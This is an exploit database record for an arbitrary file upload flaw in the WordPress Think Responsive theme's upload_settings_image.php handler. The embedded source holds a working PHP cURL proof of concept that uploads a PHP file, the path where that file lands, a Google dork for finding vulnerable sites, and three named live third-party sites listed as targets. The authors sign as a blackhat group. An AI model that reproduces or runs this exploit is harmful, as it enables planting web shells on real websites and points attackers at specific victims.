Description
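Exploit for the PHP platform, in the web applications category: an arbitrary file upload in the WordPress Think Responsive theme (reported against v1.0) through the theme's bundled `upload_settings_image.php` upload handler. The record lists no CVE, and its CVSS of 0.0 with vector "NONE" should be read as "not scored" rather than as low severity.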
{"id": "1337DAY-ID-21452", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress Think Responsive Themes Arbitrary File Upload Vulnerability", "description": "Exploit for php platform in category web applications", "published": "2013-11-02T00:00:00", "modified": "2013-11-02T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/21452", "reporter": "Byakuya", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-01-08T15:16:12", "viewCount": 10, "enchantments": {"score": {"value": 0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "sourceHref": "https://0day.today/exploit/21452", "sourceData": "###################################################################################################\r\n#_________ .___ _______ ___. .__ \r\n#\\_ ___ \\ ____ __| _/____ \\ \\ ______ _ _\\_ |__ |__| ____ \r\n#/ \\ \\/ / _ \\ / __ |/ __ \\ / | \\_/ __ \\ \\/ \\/ /| __ \\| |/ __ \\ \r\n#\\ \\___( <_> ) /_/ \\ ___/ / | \\ ___/\\ / | \\_\\ \\ \\ ___/ \r\n# \\______ /\\____/\\____ |\\___ > \\____|__ /\\___ >\\/\\_/ |___ /__|\\___ >\r\n# \\/ \\/ \\/ \\/ \\/ \\/ \\/ \r\n###################################################################################################\r\n# Exploit Title: WordPress Think Responsive Themes Arbitrary File Upload Vulnerability\r\n# Author: Byakuya\r\n# Date: 11/01/2013\r\n# Vendor Homepage: http://themeforest.net/\r\n# Themes Link: http://themeforest.net/item/think-responsive-portfolio-and-blog/2281513\r\n# Price: $40\r\n# Affected Version: v1.0\r\n# Infected File: upload_settings_image.php\r\n# Category: webapps/php\r\n# Google dork: inurl:/wp-content/themes/thinkresponsive\r\n# Tested on : Windows/Linux\r\n###################################################################################################\r\n\r\n# Exploit & POC :\r\n\r\n<?php\r\n$uploadfile=\"up.php\";\r\n$ch = 
curl_init(\"http://127.0.0.1/wordpress/wp-content/themes/ThinkResponsive/includes/uploadify/upload_settings_image.php\");\r\ncurl_setopt($ch, CURLOPT_POST, true); \r\ncurl_setopt($ch, CURLOPT_POSTFIELDS,\r\n array('Filedata'=>\"@$uploadfile\"));\r\ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\r\n$postResult = curl_exec($ch);\r\ncurl_close($ch);\r\nprint \"$postResult\";\r\n?>\r\n\r\n#File path: \r\nhttp://127.0.0.1/wordpress/wp-content/uploads/settingsimages/up.php\r\n\r\n#Live Target :\r\nhttp://lucasjackson.net/wp-content/themes/ThinkResponsive/ThinkResponsive/includes/uploadify/upload_settings_image.php\r\nhttp://runamuckdesign.com/newsite/wp-content/themes/ThinkResponsive/includes/uploadify/upload_settings_image.php\r\nhttp://www.theptmg.com/wp-content/themes/ThinkResponsive/includes/uploadify/upload_settings_image.php\r\n\r\n#Credit: ./Byakuya ./Mr Ohsem ./Cai ./RatKid ./Agam ./Lord-Router ./X-Tuned ./Rec0ded ./Code-Newbie ./Newbie-Security\r\n#Facebook: https://www.facebook.com/CodeNewbieCrew\r\n#Website: http://www.codenewbie.net / http://www.newbie-security.or.id/\r\n#Malaysia & Indonesia BlackHat\r\n###################################################################################################\n\n# 0day.today [2018-01-08] #", "_state": {"dependencies": 1645324256, "score": 1659766679, "epss": 1678812679}}
{}